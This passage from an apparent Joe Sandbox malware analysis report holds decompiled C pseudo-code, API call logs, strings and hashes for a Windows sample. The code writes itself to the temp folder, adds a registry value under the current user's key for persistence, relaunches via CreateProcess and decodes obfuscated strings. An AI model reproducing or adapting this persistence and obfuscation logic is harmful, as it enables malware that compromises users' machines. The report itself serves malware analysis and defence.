										StartServiceCtrlDispatcherA( &_v64);
										goto L19;
									}
									_t272 =  &_v372;
									_t449 = _t272 + 1;
									do {
										_t438 =  *_t272;
										_t272 = _t272 + 1;
										__eflags = _t438;
									} while (_t438 != 0);
									__eflags = _t272 - _t449 - 0x20;
									if(_t272 - _t449 >= 0x20) {
										goto L116;
									}
									E0040EF00(0x4133b0,  &_v372);
									_pop(_t438);
									goto L117;
								}
								_t459 = _v8 + 3;
								_t276 = E0040ED03(_t459, 0x20);
								_pop(_t438);
								__eflags = _t276;
								if(_t276 != 0) {
									L107:
									_t454 = _t276 - _t459;
									__eflags = _t454 - 0x20;
									if(_t454 >= 0x20) {
										_t454 = 0x1f;
									}
									E0040EE08(0x412184, _t459, _t454);
									_t467 = _t467 + 0xc;
									 *((char*)(_t454 + 0x412184)) = 0;
									goto L110;
								}
								_t279 = _t459;
								_t449 = _t279 + 1;
								do {
									_t438 =  *_t279;
									_t279 = _t279 + 1;
									__eflags = _t438;
								} while (_t438 != 0);
								_t276 = _t279 - _t449 + _t459;
								__eflags = _t276;
								goto L107;
							}
							_t282 = _v8 + 3;
							_v672 = 0;
							__eflags =  *_t282 - 0x22;
							_v20 = _t282;
							if( *_t282 != 0x22) {
								_t283 = E0040ED03(_v20, 0x20);
								_pop(_t438);
								__eflags = _t283;
								if(_t283 == 0) {
									_t283 =  &(_a12[lstrlenA(_a12)]);
									__eflags = _t283;
								}
								_t284 = _t283 - _v8;
								_v24 = _t284;
								__eflags = _t284 + 0xfffffffd;
								E0040EE08( &_v672, _v20, _t284 + 0xfffffffd);
								 *((char*)(_t464 + _v24 - 0x29f)) = 0;
								L98:
								_t468 = _t468 + 0xc;
								L99:
								__eflags = _v672;
								if(_v672 != 0) {
									E0040EE08(0x4133d8,  &_v672, 0x103);
									_t468 = _t468 + 0xc;
								}
								 *0x412cc0 = 1;
								goto L102;
							}
							_v20 = _v8 + 4;
							_t294 = E0040ED03(_v8 + 4, 0x22);
							_pop(_t438);
							__eflags = _t294;
							if(_t294 == 0) {
								goto L99;
							}
							_v24 = _t294 - _v8;
							E0040EE08( &_v672, _v20, _t294 - _v8 + 0xfffffffc);
							 *((char*)(_t464 + _v24 - 0x2a0)) = 0;
							goto L98;
						}
						_v36 = 0;
						if(_t257 >= 4 || _v48 > 0x61 && _v44 != 0) {
							L84:
							if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) != 0) {
								_t303 =  &_v672;
								if(_v672 == 0x22) {
									_t303 =  &_v671;
								}
								if(_t303[1] == 0x3a && _t303[2] == 0x5c) {
									_t303[3] = 0;
									_t304 = GetDriveTypeA(_t303);
									_t515 = _t304 - 2;
									if(_t304 != 2) {
										E00409145(_t515);
										_t438 = 1;
									}
								}
							}
							goto L19;
						} else {
							E00404280(_t438, 1); // executed
							_pop(_t438);
							if(_v672 == 0) {
								goto L84;
							}
							_t309 = E0040675C( &_v672,  &_v12, 0); // executed
							_t467 = _t467 + 0xc;
							_v8 = _t309;
							if(_t309 == 0 || _v12 == 0) {
								goto L84;
							} else {
								_v32 = 0;
								_v28 = 0;
								if(_v16 == 2) {
									L55:
									__eflags = _v16 - 3;
									if(_v16 >= 3) {
										L83:
										E0040EC2E(_v8);
										_pop(_t438);
										if(_v36 != 0) {
											goto L19;
										}
										goto L84;
									}
									_t312 = E00402544(_t459, 0x410a3c, 0xc, 0xe4, 0xc8);
									_t469 = _t467 + 0x14;
									__eflags = GetEnvironmentVariableA(_t312,  &_v1272, 0x1f4);
									if(__eflags == 0) {
										L82:
										E0040EE2A(_t438, _t459, 0, _t454);
										_t467 = _t469 + 0xc;
										goto L83;
									}
									_t318 = E004099D2(_t449, __eflags,  &_v1272,  &_v672,  &_v704, _v8, _v12);
									_t469 = _t469 + 0x14;
									__eflags = _t318;
									if(_t318 == 0) {
										goto L82;
									}
									E0040EE2A(_t438, _t459, 0, _t454);
									_t470 = _t469 + 0xc;
									_v1272 = 0x22;
									lstrcpyA( &_v1271,  &_v672);
									_t324 = lstrlenA( &_v1272);
									 *((char*)(_t464 + _t324 - 0x4f4)) = 0x22;
									_t325 = _t324 + 1;
									__eflags = _v16 - 2;
									_a12 = _t325;
									 *((char*)(_t464 + _t325 - 0x4f4)) = 0;
									if(_v16 != 2) {
										L60:
										_push(0);
										_push( &_v112);
										_t328 = E00406DC2(_t438) ^ 0x61616161;
										__eflags = _t328;
										_push(_t328);
										E0040F133();
										_t470 = _t470 + 0xc;
										L61:
										_t331 = E00402544(_t459,  &E004106AC, 0x2e, 0xe4, 0xc8);
										_t471 = _t470 + 0x14;
										_t332 = RegOpenKeyExA(0x80000001, _t331, 0, 0x103,  &_v24);
										_v20 = _t332;
										__eflags = _t332;
										if(_t332 == 0) {
											_t373 =  &(_a12[1]);
											__eflags = _t373;
											_t376 = RegSetValueExA(_v24,  &_v112, 0, 1,  &_v1272, _t373); // executed
											_v20 = _t376;
											RegCloseKey(_v24);
										}
										E0040EE2A(_t438, _t459, 0, _t454);
										E0040EE2A(_t438,  &_v772, 0, 0x44);
										_v772.cb = 0x44;
										E0040EE2A(_t438,  &_v64, 0, 0x10);
										_t469 = _t471 + 0x24;
										_t340 = GetModuleFileNameA(GetModuleHandleA(0),  &_v372, 0x104);
										__eflags = _t340;
										if(_t340 != 0) {
											__eflags = _v372 - 0x22;
											_t357 =  &_v372;
											_v40 = _t357;
											if(_v372 == 0x22) {
												_t357 =  &_v371;
												_v40 = _t357;
											}
											__eflags =  *((char*)(_t357 + 1)) - 0x3a;
											if( *((char*)(_t357 + 1)) == 0x3a) {
												__eflags =  *((char*)(_t357 + 2)) - 0x5c;
												if( *((char*)(_t357 + 2)) == 0x5c) {
													_t358 = _v40;
													_t438 = _t358[3];
													_a15 = _t358[3];
													_t358[3] = 0;
													_t359 = GetDriveTypeA(_t358);
													__eflags = _t359 - 2;
													if(_t359 != 2) {
														_t438 = _v40;
														_v40[3] = _a15;
														lstrcatA( &_v1272, E00402544(_t459, 0x410a38, 4, 0xe4, 0xc8));
														E0040EE2A(_v40, _t459, 0, _t454);
														_t469 = _t469 + 0x20;
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														lstrcatA( &_v1272,  &_v372);
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														_v36 = 1;
													}
												}
											}
										}
										__eflags = _v32;
										if(_v32 != 0) {
											__eflags = _v28;
											if(_v28 != 0) {
												wsprintfA( &_v372, "%X%08X", _v28, _v32);
												lstrcatA( &_v1272, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
												E0040EE2A(_t438, _t459, 0, _t454);
												_t469 = _t469 + 0x30;
												lstrcatA( &_v1272,  &_v372);
											}
										}
										_t344 = CreateProcessA(0,  &_v1272, 0, 0, 0, 0x8000000, 0, 0,  &_v772,  &_v64);
										__eflags = _t344;
										if(_t344 == 0) {
											DeleteFileA( &_v672);
											_v36 = 0;
										}
										__eflags = _v16 - 1;
										if(_v16 == 1) {
											__eflags = _v20;
											if(_v20 == 0) {
												E004096FF(_t438);
											}
										}
										goto L82;
									}
									__eflags = _v112;
									if(_v112 != 0) {
										goto L61;
									}
									goto L60;
								}
								_t379 = GetTempPathA(0x1f4,  &_v1272);
								_t494 = _t379;
								if(_t379 == 0) {
									goto L55;
								}
								_t383 = E004099D2(_t449, _t494,  &_v1272,  &_v672,  &_v704, _v8, _v12); // executed
								_t467 = _t467 + 0x14;
								if(_t383 == 0) {
									goto L55;
								}
								_v80 = 0;
								if(_v16 < 3 || _v372 == 0) {
									_push(0);
									_push( &_v80);
									_push(E00406DC2(_t438) ^ 0x61616161);
									E0040F133();
									_t474 = _t467 + 0xc;
									lstrcpyA( &_v372, E00406CC9(_t438));
									lstrcatA( &_v372,  &_v80);
									lstrcatA( &_v372,  &E0041070C);
									_t396 = 0;
									__eflags = 0;
									goto L43;
								} else {
									_t410 =  &_v372;
									_t450 = _t410 + 1;
									do {
										_t441 =  *_t410;
										_t410 = _t410 + 1;
									} while (_t441 != 0);
									_t411 = _t410 - _t450;
									if(_t411 > 0 &&  *((char*)(_t464 + _t411 - 0x171)) == 0x5c) {
										_t411 = _t411 - 1;
									}
									_t451 = _t411;
									if(_t411 <= 0) {
										L41:
										_t449 = _t451 - _t411;
										_a12 = _t451 - _t411;
										E0040EE08( &_v80, _t464 + _t411 - 0x170, _t451 - _t411);
										 *((char*)(_t464 + _a12 - 0x4c)) = 0;
										_t474 = _t467 + 0xc;
										_t396 = 1;
										L43:
										if(_v44 == 0 || _v48 < 0x50) {
											_t438 = 1;
											__eflags = 1;
										} else {
											_t438 = 0;
										}
										_push(_t438);
										_push(_t396);
										_push( &_v372);
										_push( &_v80);
										_push( &_v672);
										_push( &_v704);
										_t401 = E00409326(_t438, _t449);
										_t467 = _t474 + 0x18;
										if(_t401 == 0) {
											_t402 =  *0x41217c; // 0x0
											_v32 = _t402;
											_t403 =  *0x412180; // 0x0
											goto L54;
										} else {
											if(GetFileAttributesExA( &_v672, 0,  &(_v772.dwXCountChars)) != 0) {
												_t403 = 0x61080108;
												 *0x412180 = 0x61080108;
												 *0x41217c = 0;
												_v32 = 0;
												L54:
												_v28 = _t403;
												DeleteFileA( &_v672);
												goto L55;
											}
											_t459 = 1;
											if(_v16 == 1) {
												E004096FF(_t438);
											}
											_v36 = _t459;
											goto L83;
										}
									} else {
										_t442 =  &_v372;
										while( *((char*)(_t442 + _t411 - 1)) != 0x5c) {
											_t411 = _t411 - 1;
											if(_t411 > 0) {
												continue;
											}
											goto L41;
										}
										goto L41;
									}
								}
							}
						}
					}
					_t417 = _v8;
					_t454 = _t417 + 3;
					_v372 = 0;
					if( *((char*)(_t417 + 3)) != 0x22) {
						_t418 = E0040ED03(_t454, 0x20);
						_pop(_t438);
						__eflags = _t418;
						if(_t418 == 0) {
							_t418 =  &(_a12[lstrlenA(_a12)]);
							__eflags = _t418;
						}
						_t459 = _t418 - _v8;
						__eflags = _t459;
						E0040EE08( &_v372, _t454, _t459 - 3);
						 *((char*)(_t464 + _t459 - 0x173)) = 0;
						L13:
						_t467 = _t467 + 0xc;
						L14:
						if(_v372 != 0 && _v672 != 0) {
							_t424 = E0040675C( &_v672,  &_v12, 0);
							_t467 = _t467 + 0xc;
							if(_t424 != 0 && _v12 != 0) {
								_t426 = E00406A60(_t449,  &_v372, _t424, _v12);
								_t467 = _t467 + 0xc;
								_v12 = _t426;
							}
						}
						goto L19;
					}
					_t454 = _t417 + 4;
					_t428 = E0040ED03(_t417 + 4, 0x22);
					_pop(_t438);
					if(_t428 == 0) {
						goto L14;
					} else {
						_t459 = _t428 - _v8;
						E0040EE08( &_v372, _t454, _t459 - 4);
						 *((char*)(_t464 + _t459 - 0x174)) = 0;
						goto L13;
					}
				}
			}

0x00409a7f
0x00409a83
0x00409a8a
0x00409a90
0x00409a97
0x00409a9d
0x0040a3cc
0x0040a3d2
0x0040a41c
0x0040a42c
0x0040a43a
0x0040a440
0x0040a448
0x0040a452
0x0040a45a
0x0040a469
0x0040a46b
0x0040a470
0x0040a475
0x0040a47a
0x0040a48a
0x0040a48c
0x0040a497
0x0040a497
0x0040a49d
0x00000000
0x00000000
0x0040a49f
0x0040a4a7
0x0040a4ac
0x0040a4be
0x0040a4c3
0x00000000
0x0040a4c3
0x0040a4ae
0x0040a4ae
0x0040a4b3
0x0040a4b5
0x0040a4b9
0x0040a4b9
0x00000000
0x0040a4b5
0x0040a497
0x0040a3da
0x0040a406
0x0040a407
0x0040a409
0x0040a40b
0x00000000
0x00000000
0x0040a3e8
0x0040a3eb
0x00000000
0x00000000
0x0040a3ed
0x0040a3f3
0x0040a3f6
0x00000000
0x00000000
0x0040a3f8
0x0040a3f8
0x0040a3f8
0x0040a400
0x0040a400
0x0040a414
0x0040a419
0x00000000
0x00409aa3
0x00409ab0
0x00409ac2
0x00409ac4
0x00409ac4
0x00409ad1
0x00409ae1
0x00409aef
0x00409af4
0x00409af9
0x00409afb
0x00409afb
0x00409af9
0x00409afd
0x00409b14
0x00409b1a
0x00409b26
0x00409b2b
0x00409b33
0x00409b36
0x00409b3b
0x00409b41
0x00409c26
0x00409c2b
0x00409c2e
0x00409c33
0x0040a1de
0x0040a1e4
0x0040a1fd
0x0040a211
0x0040a214
0x0040a219
0x0040a21c
0x0040a21f
0x0040a2e2
0x0040a305
0x0040a308
0x0040a30d
0x0040a310
0x0040a313
0x0040a35a
0x0040a35a
0x0040a35f
0x0040a361
0x0040a3c2
0x00409c05
0x00409c06
0x00409c06
0x0040a363
0x0040a369
0x0040a397
0x0040a397
0x0040a39d
0x0040a3a3
0x0040a3aa
0x0040a3b1
0x0040a3b4
0x0040a3b7
0x00000000
0x0040a3b7
0x0040a36b
0x0040a371
0x0040a374
0x0040a374
0x0040a376
0x0040a377
0x0040a377
0x0040a37d
0x0040a380
0x00000000
0x00000000
0x0040a38e
0x0040a394
0x00000000
0x0040a394
0x0040a318
0x0040a31e
0x0040a324
0x0040a325
0x0040a327
0x0040a339
0x0040a33b
0x0040a33d
0x0040a340
0x0040a344
0x0040a344
0x0040a34c
0x0040a351
0x0040a354
0x00000000
0x0040a354
0x0040a329
0x0040a32b
0x0040a32e
0x0040a32e
0x0040a330
0x0040a331
0x0040a331
0x0040a337
0x0040a337
0x00000000
0x0040a337
0x0040a228
0x0040a22b
0x0040a231
0x0040a234
0x0040a237
0x0040a27a
0x0040a280
0x0040a281
0x0040a283
0x0040a28e
0x0040a28e
0x0040a28e
0x0040a291
0x0040a294
0x0040a297
0x0040a2a5
0x0040a2ad
0x0040a2b4
0x0040a2b4
0x0040a2b7
0x0040a2b7
0x0040a2bd
0x0040a2d0
0x0040a2d5
0x0040a2d5
0x0040a2d8
0x00000000
0x0040a2d8
0x0040a242
0x0040a245
0x0040a24b
0x0040a24c
0x0040a24e
0x00000000
0x00000000
0x0040a253
0x0040a264
0x0040a26c
0x00000000
0x0040a26c
0x00409c39
0x00409c3f
0x0040a167
0x0040a183
0x0040a190
0x0040a196
0x0040a198
0x0040a198
0x0040a1a2
0x0040a1b3
0x0040a1b6
0x0040a1bc
0x0040a1bf
0x0040a1c7
0x0040a1cc
0x0040a1cc
0x0040a1bf
0x0040a1a2
0x00000000
0x00409c54
0x00409c56
0x00409c5b
0x00409c62
0x00000000
0x00000000
0x00409c74
0x00409c79
0x00409c7c
0x00409c81
0x00000000
0x00409c90
0x00409c94
0x00409c97
0x00409c9a
0x00409e3e
0x00409e3e
0x00409e42
0x0040a155
0x0040a158
0x0040a15d
0x0040a161
0x00000000
0x00000000
0x00000000
0x0040a161
0x00409e66
0x00409e6b
0x00409e75
0x00409e77
0x0040a14a
0x0040a14d
0x0040a152
0x00000000
0x0040a152
0x00409e98
0x00409e9d
0x00409ea0
0x00409ea2
0x00000000
0x00000000
0x00409eab
0x00409eb0
0x00409ec1
0x00409ec8
0x00409ed5
0x00409edb
0x00409ee3
0x00409ee4
0x00409ee8
0x00409eeb
0x00409ef2
0x00409ef9
0x00409efc
0x00409efd
0x00409f03
0x00409f03
0x00409f08
0x00409f09
0x00409f0e
0x00409f11
0x00409f2d
0x00409f32
0x00409f3b
0x00409f41
0x00409f44
0x00409f46
0x00409f4b
0x00409f4b
0x00409f5e
0x00409f67
0x00409f6a
0x00409f6a
0x00409f73
0x00409f82
0x00409f8e
0x00409f98
0x00409f9d
0x00409fb4
0x00409fba
0x00409fbc
0x00409fc2
0x00409fc9
0x00409fcf
0x00409fd2
0x00409fd4
0x00409fda
0x00409fda
0x00409fdd
0x00409fe1
0x00409fe7
0x00409feb
0x00409ff1
0x00409ff4
0x00409ff8
0x00409ffb
0x00409ffe
0x0040a004
0x0040a007
0x0040a010
0x0040a025
0x0040a038
0x0040a041
0x0040a046
0x0040a049
0x0040a050
0x0040a05e
0x0040a05e
0x0040a072
0x0040a078
0x0040a07f
0x0040a08d
0x0040a08d
0x0040a093
0x0040a093
0x0040a007
0x00409feb
0x00409fe1
0x0040a09a
0x0040a09d
0x0040a09f
0x0040a0a2
0x0040a0b6
0x0040a0de
0x0040a0e7
0x0040a0ec
0x0040a0fd
0x0040a0fd
0x0040a0a2
0x0040a120
0x0040a126
0x0040a128
0x0040a131
0x0040a137
0x0040a137
0x0040a13a
0x0040a13e
0x0040a140
0x0040a143
0x0040a145
0x0040a145
0x0040a143
0x00000000
0x0040a13e
0x00409ef4
0x00409ef7
0x00000000
0x00000000
0x00000000
0x00409ef7
0x00409cac
0x00409cb2
0x00409cb4
0x00000000
0x00000000
0x00409cd5
0x00409cda
0x00409cdf
0x00000000
0x00000000
0x00409ce9
0x00409cec
0x00409d58
0x00409d59
0x00409d64
0x00409d65
0x00409d6a
0x00409d7a
0x00409d8b
0x00409d9d
0x00409da3
0x00409da3
0x00000000
0x00409cf6
0x00409cf6
0x00409cfc
0x00409cff
0x00409cff
0x00409d01
0x00409d02
0x00409d06
0x00409d0a
0x00409d16
0x00409d16
0x00409d17
0x00409d1b
0x00409d2f
0x00409d2f
0x00409d3e
0x00409d41
0x00409d49
0x00409d4f
0x00409d52
0x00409da5
0x00409da8
0x00409db6
0x00409db6
0x00409db0
0x00409db0
0x00409db0
0x00409db7
0x00409db8
0x00409dbf
0x00409dc3
0x00409dca
0x00409dd1
0x00409dd2
0x00409dd7
0x00409ddc
0x00409e21
0x00409e26
0x00409e29
0x00000000
0x00409dde
0x00409df5
0x00409e0c
0x00409e11
0x00409e16
0x00409e1c
0x00409e2e
0x00409e2e
0x00409e38
0x00000000
0x00409e38
0x00409df9
0x00409dfd
0x00409dff
0x00409dff
0x00409e04
0x00000000
0x00409e04
0x00409d1d
0x00409d1d
0x00409d23
0x00409d2a
0x00409d2d
0x00000000
0x00000000
0x00000000
0x00409d2d
0x00000000
0x00409d23
0x00409d1b
0x00409cec
0x00409c81
0x00409c3f
0x00409b47
0x00409b4a
0x00409b4d
0x00409b56
0x00409b8b
0x00409b91
0x00409b92
0x00409b94
0x00409b9f
0x00409b9f
0x00409b9f
0x00409ba4
0x00409ba4
0x00409bb3
0x00409bb8
0x00409bbf
0x00409bbf
0x00409bc2
0x00409bc8
0x00409bde
0x00409be3
0x00409be8
0x00409bfa
0x00409bff
0x00409c02
0x00409c02
0x00409be8
0x00000000
0x00409bc8
0x00409b58
0x00409b5e
0x00409b64
0x00409b67
0x00000000
0x00409b69
0x00409b6b
0x00409b7a
0x00409b7f
0x00000000
0x00409b7f
0x00409b67

APIs

SetErrorMode.KERNELBASE(00000003), ref: 00409A7F
SetErrorMode.KERNELBASE(00000003), ref: 00409A83
SetUnhandledExceptionFilter.KERNELBASE(00406511), ref: 00409A8A

Part of subcall function 0040EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
Part of subcall function 0040EC54: GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
Part of subcall function 0040EC54: GetTickCount.KERNEL32 ref: 0040EC78

GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 00409AB3
GetModuleFileNameA.KERNEL32(00000000), ref: 00409ABA
GetCommandLineA.KERNEL32 ref: 00409AFD
lstrlenA.KERNEL32(?), ref: 00409B99
ExitProcess.KERNEL32 ref: 00409C06
GetTempPathA.KERNEL32(000001F4,?), ref: 00409CAC
lstrcpyA.KERNEL32(?,00000000), ref: 00409D7A
lstrcatA.KERNEL32(?,?), ref: 00409D8B
lstrcatA.KERNEL32(?,0041070C), ref: 00409D9D
GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00409DED
DeleteFileA.KERNEL32(00000022), ref: 00409E38
GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00409E6F
lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409EC8
lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409ED5
RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 00409F3B
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 00409F5E
RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00409F6A
GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00409FAD
GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FB4
GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FFE
lstrcatA.KERNEL32(00000022,00000000), ref: 0040A038
lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A05E
lstrcatA.KERNEL32(00000022,00000022), ref: 0040A072
lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A08D
wsprintfA.USER32 ref: 0040A0B6
lstrcatA.KERNEL32(00000022,00000000), ref: 0040A0DE
lstrcatA.KERNEL32(00000022,?), ref: 0040A0FD
CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0040A120
DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0040A131
GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0040A174
GetModuleFileNameA.KERNEL32(00000000), ref: 0040A17B
GetDriveTypeA.KERNEL32(00000022), ref: 0040A1B6
GetCommandLineA.KERNEL32 ref: 0040A1E5

Part of subcall function 004099D2: lstrcpyA.KERNEL32(?,?,00000100,PromptOnSecureDesktop,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
Part of subcall function 004099D2: lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
Part of subcall function 004099D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52

lstrlenA.KERNEL32(?), ref: 0040A288
StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040A3B7
GetLastError.KERNEL32 ref: 0040A3ED
Sleep.KERNEL32(000003E8), ref: 0040A400
DeleteFileA.KERNEL32(004133D8), ref: 0040A407
CreateThread.KERNEL32(00000000,00000000,0040405E,00000000,00000000,00000000), ref: 0040A42C
WSAStartup.WS2_32(00001010,?), ref: 0040A43A
CreateThread.KERNEL32(00000000,00000000,0040877E,00000000,00000000,00000000), ref: 0040A469
Sleep.KERNEL32(00000BB8), ref: 0040A48A
GetTickCount.KERNEL32 ref: 0040A49F
GetTickCount.KERNEL32 ref: 0040A4B7
Sleep.KERNEL32(00002710), ref: 0040A4C3

Strings

", xrefs: 0040A189
", xrefs: 0040A078
PromptOnSecureDesktop, xrefs: 00409B14, 00409B19, 00409B32, 00409E65, 00409EAA, 00409F2C, 00409F72, 0040A024, 0040A040, 0040A0CD, 0040A0E6, 0040A14C, 0040A1FC, 0040A210, 0040A2F3, 0040A304
D, xrefs: 00409F8E
\, xrefs: 00409D0C
", xrefs: 00409EDB
%X%08X, xrefs: 0040A0B0
P, xrefs: 00409DAA

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
String ID: "$"$"$%X%08X$D$P$PromptOnSecureDesktop$\
API String ID: 2089075347-2824936573
Opcode ID: 22371034e60be2e8533f9a4e74c45ceaa5b305d0f588b9e787c30c92806b4a47
Instruction ID: 8eb9ea6afe9ee9197cc0e6cd2b03883a1bab6226c4cfd690aa98a93bf3167ae2
Opcode Fuzzy Hash: 22371034e60be2e8533f9a4e74c45ceaa5b305d0f588b9e787c30c92806b4a47
Instruction Fuzzy Hash: 275291B1D40259BBDB11DBA1CC49EEF7BBCAF04304F1444BBF509B6182D6788E948B69

Uniqueness

Uniqueness Score: -1.00%

Function 00406A60, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 106
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406A60(int __edx, CHAR* _a4, intOrPtr _a8, int _a12) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				void* _v12;
				long _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				long _v32;
				void* _t31;
				int _t42;
				intOrPtr _t43;
				int _t44;
				void* _t53;
				int _t59;
				CHAR* _t68;
				void* _t69;
				int _t73;

				_t59 = __edx;
				_t68 = _a4;
				_t31 = CreateFileA(_t68, 0x40000000, 0, 0, 2, 0x80, 0); // executed
				_v12 = _t31;
				if(_t31 == 0xffffffff) {
					 *0x412180 = 0x61080101;
					 *0x41217c = GetLastError();
					__eflags = 0;
					return 0;
				}
				_v8 =  *_t68;
				_v7 = _t68[1];
				_t63 = _a12;
				_v6 = _t68[2];
				_v5 = 0;
				_t42 = GetDiskFreeSpaceA( &_v8,  &_v20,  &_v24,  &_v16,  &_v32); // executed
				if(_t42 == 0) {
					L10:
					_t43 = E00406987(0x500000, _v12, _a8, _a12, _t63); // executed
					_v28 = _t43;
					if(_t43 != 0) {
						_t44 = FindCloseChangeNotification(_v12); // executed
						__eflags = _t44;
						if(_t44 != 0) {
							L15:
							return _v28;
						}
						 *0x412180 = 0x61080103;
						 *0x41217c = GetLastError();
						CloseHandle(_v12);
						L14:
						DeleteFileA(_t68);
						goto L15;
					}
					 *0x412180 = 0x61080102;
					 *0x41217c = GetLastError();
					CloseHandle(_v12);
					goto L14;
				}
				_t53 = E0040EB0E(_v20 * _v24, 0, _v16, 0);
				_t69 = _t69 + 0x10;
				_t73 = _t59;
				if(_t73 < 0) {
					goto L10;
				}
				if(_t73 > 0 || _t53 > 0x6400000) {
					_t22 = E0040ECA5() % 0x500000 + 0xa00000; // 0xa00000
					_t63 = _t22;
					goto L10;
				} else {
					__eflags = _t59;
					if(__eflags < 0) {
						goto L10;
					}
					if(__eflags > 0) {
						L9:
						_t63 = (E0040ECA5() & 0x001fffff) + 0x300000;
						__eflags = (E0040ECA5() & 0x001fffff) + 0x300000;
						goto L10;
					}
					__eflags = _t53 - 0x3200000;
					if(_t53 <= 0x3200000) {
						goto L10;
					}
					goto L9;
				}
			}

0x00406a60
0x00406a68
0x00406a7d
0x00406a83
0x00406a89
0x00406b8c
0x00406b9c
0x00406ba1
0x00000000
0x00406ba1
0x00406a91
0x00406a97
0x00406a9e
0x00406aa1
0x00406ab8
0x00406abb
0x00406ac3
0x00406b1d
0x00406b27
0x00406b2f
0x00406b34
0x00406b5f
0x00406b61
0x00406b63
0x00406b86
0x00000000
0x00406b89
0x00406b65
0x00406b78
0x00406b7d
0x00406b7f
0x00406b80
0x00000000
0x00406b80
0x00406b36
0x00406b49
0x00406b4e
0x00000000
0x00406b4e
0x00406ad2
0x00406ad7
0x00406ada
0x00406adc
0x00000000
0x00000000
0x00406ade
0x00406af5
0x00406af5
0x00000000
0x00406afd
0x00406afd
0x00406aff
0x00000000
0x00000000
0x00406b01
0x00406b0a
0x00406b17
0x00406b17
0x00000000
0x00406b17
0x00406b03
0x00406b08
0x00000000
0x00000000
0x00000000
0x00406b08

APIs

CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,73BB81D0,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
GetDiskFreeSpaceA.KERNELBASE(00409E9D,00409A60,?,?,?,PromptOnSecureDesktop,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B5F
GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B6F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B7D
DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
GetLastError.KERNEL32(?,?,?,00409A60,?,?,00409E9D,?,?,?,?,?,00409E9D,?,00000022,?), ref: 00406B96

Strings

PromptOnSecureDesktop, xrefs: 00406A9D

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: CloseErrorLast$FileHandle$ChangeCreateDeleteDiskFindFreeNotificationSpace
String ID: PromptOnSecureDesktop
API String ID: 1251348514-2980165447
Opcode ID: f20540f086f6cde11da1c0912bd8b4db093012cd4bd3a0bf5db3ffead886992b
Instruction ID: 9406106fe81e47b207fd746d5c11beca6957dd7a726dfd862efddfda91f1d23f
Opcode Fuzzy Hash: f20540f086f6cde11da1c0912bd8b4db093012cd4bd3a0bf5db3ffead886992b
